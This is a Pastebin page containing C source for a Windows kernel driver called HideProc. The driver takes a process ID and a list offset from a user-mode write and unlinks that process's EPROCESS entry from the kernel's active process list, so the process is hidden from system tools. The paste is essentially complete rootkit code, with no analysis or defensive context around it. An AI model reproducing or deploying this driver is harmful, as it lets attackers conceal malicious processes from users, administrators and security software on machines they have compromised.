API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 17th, 2019
85
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.45 KB | None | 0 0
raw download clone embed print report
  1. #include <ntddk.h>
  2. #include <ntifs.h>
  3.  
  4. typedef unsigned int UINT;
  5. typedef int BOOL;
  6.  
  7. typedef struct _hpstruct{
  8. UINT uPid;
  9. UINT uFlinkOffset;
  10. }hpstruct;
  11.  
  12. NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath);
  13. NTSTATUS HideProc_Create(PDEVICE_OBJECT DeviceObject, PIRP Irp);
  14. NTSTATUS HideProc_Write(PDEVICE_OBJECT DeviceObject, PIRP Irp);
  15. NTSTATUS HideProc_Close(PDEVICE_OBJECT DeviceObject, PIRP Irp);
  16. VOID HideProc_Unload(PDRIVER_OBJECT DriverObject);
  17. NTSTATUS HideProc_Unsupported(PDEVICE_OBJECT DeviceObject, PIRP Irp);
  18.  
  19. #pragma alloc_text(INIT, DriverEntry)
  20. #pragma alloc_text(PAGE, HideProc_Create)
  21. #pragma alloc_text(PAGE, HideProc_Write)
  22. #pragma alloc_text(PAGE, HideProc_Close)
  23. #pragma alloc_text(PAGE, HideProc_Unload)
  24. #pragma alloc_text(PAGE, HideProc_Unsupported)
  25.  
  26.  
  27. NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath){
  28. UNICODE_STRING usDriverName, usDosDeviceName;
  29. PDEVICE_OBJECT pDeviceObject;
  30. NTSTATUS ntStatus;
  31. UINT uiIndex;
  32.  
  33. DbgPrint("HideProc DriverEntry Called\n");
  34.  
  35. RtlInitUnicodeString(&usDriverName, L"\\Device\\HideProc");
  36. RtlInitUnicodeString(&usDosDeviceName, L"\\DosDevices\\HideProc");
  37.  
  38. ntStatus = IoCreateDevice(pDriverObject, 0, &usDriverName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &pDeviceObject);
  39. if(NT_SUCCESS(ntStatus)){
  40. for(uiIndex = 0; uiIndex < IRP_MJ_MAXIMUM_FUNCTION; uiIndex++)
  41. pDriverObject->MajorFunction[uiIndex] = HideProc_Unsupported;
  42. pDriverObject->MajorFunction[IRP_MJ_CREATE] = HideProc_Create;
  43. pDriverObject->MajorFunction[IRP_MJ_WRITE] = HideProc_Write;
  44. pDriverObject->MajorFunction[IRP_MJ_CLOSE] = HideProc_Close;
  45. pDriverObject->DriverUnload = HideProc_Unload;
  46. pDeviceObject->Flags |= DO_DIRECT_IO;
  47. pDeviceObject->Flags &= (~DO_DEVICE_INITIALIZING);
  48. IoCreateSymbolicLink(&usDosDeviceName, &usDriverName);
  49. }
  50.  
  51. return ntStatus;
  52. }
  53.  
  54. NTSTATUS HideProc_Create(PDEVICE_OBJECT DeviceObject, PIRP Irp){
  55. NTSTATUS NtStatus = STATUS_SUCCESS;
  56. DbgPrint("HideProc_Create Called\n");
  57. return NtStatus;
  58. }
  59.  
  60. NTSTATUS HideProc_Write(PDEVICE_OBJECT DeviceObject, PIRP Irp){
  61. NTSTATUS NtStatus = STATUS_INVALID_PARAMETER;
  62. PIO_STACK_LOCATION pIoStackIrp = NULL;
  63. UINT dwDataWritten = 0;
  64. ULONG dwEProcAddr;
  65. PLIST_ENTRY pListProcs;
  66. PEPROCESS pEProc;
  67.  
  68. hpstruct *hps;
  69.  
  70. DbgPrint("HideProc_Write Called\n");
  71. pIoStackIrp = IoGetCurrentIrpStackLocation(Irp);
  72.  
  73. if(pIoStackIrp && Irp->MdlAddress){
  74. hps = (hpstruct *)MmGetSystemAddressForMdlSafe(Irp->MdlAddress, NormalPagePriority);
  75. if(hps){
  76. if(pIoStackIrp->Parameters.Write.Length == sizeof(hpstruct)){
  77. if(PsLookupProcessByProcessId((PVOID)hps->uPid, &pEProc) == STATUS_SUCCESS){
  78. DbgPrint("EPROCESS found. Address: %08lX.\n", pEProc);
  79. DbgPrint("Now hiding process %d...\n", hps->uPid);
  80. dwEProcAddr = (ULONG) pEProc;
  81. __try{
  82. pListProcs = (PLIST_ENTRY) (dwEProcAddr + hps->uFlinkOffset);
  83. *((ULONG*) pListProcs->Blink) = (ULONG) (pListProcs->Flink); //set flink of prev proc to flink of cur proc
  84. *((ULONG*) pListProcs->Flink+1) = (ULONG) (pListProcs->Blink); //set blink of next proc to blink of cur proc
  85. pListProcs->Flink = (PLIST_ENTRY) &(pListProcs->Flink); //set flink and blink of cur proc to themselves
  86. pListProcs->Blink = (PLIST_ENTRY) &(pListProcs->Flink); //otherwise might bsod when exiting process
  87. DbgPrint("Process now hidden.\n");
  88. }__except(EXCEPTION_EXECUTE_HANDLER){
  89. NtStatus = GetExceptionCode();
  90. DbgPrint("Exception: %d.\n", NtStatus);
  91. }
  92. NtStatus = STATUS_SUCCESS;
  93. }
  94. }else{
  95. NtStatus = STATUS_BUFFER_TOO_SMALL;
  96. }
  97. dwDataWritten = sizeof(hpstruct);
  98. }
  99. }
  100.  
  101. Irp->IoStatus.Status = NtStatus;
  102. Irp->IoStatus.Information = dwDataWritten;
  103. IoCompleteRequest(Irp, IO_NO_INCREMENT);
  104. return NtStatus;
  105. }
  106.  
  107. NTSTATUS HideProc_Close(PDEVICE_OBJECT DeviceObject, PIRP Irp){
  108. NTSTATUS NtStatus = STATUS_SUCCESS;
  109. DbgPrint("HideProc_Close Called\n");
  110. return NtStatus;
  111. }
  112.  
  113. VOID HideProc_Unload(PDRIVER_OBJECT DriverObject){
  114. UNICODE_STRING usDosDeviceName;
  115. DbgPrint("HideProc_Unload Called\n");
  116. RtlInitUnicodeString(&usDosDeviceName, L"\\DosDevices\\HideProc");
  117. IoDeleteSymbolicLink(&usDosDeviceName);
  118. IoDeleteDevice(DriverObject->DeviceObject);
  119. }
  120.  
  121. NTSTATUS HideProc_Unsupported(PDEVICE_OBJECT DeviceObject, PIRP Irp){
  122. NTSTATUS NtStatus = STATUS_NOT_SUPPORTED;
  123. DbgPrint("HideProc_Unsupported Called\n");
  124. return NtStatus;
  125. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!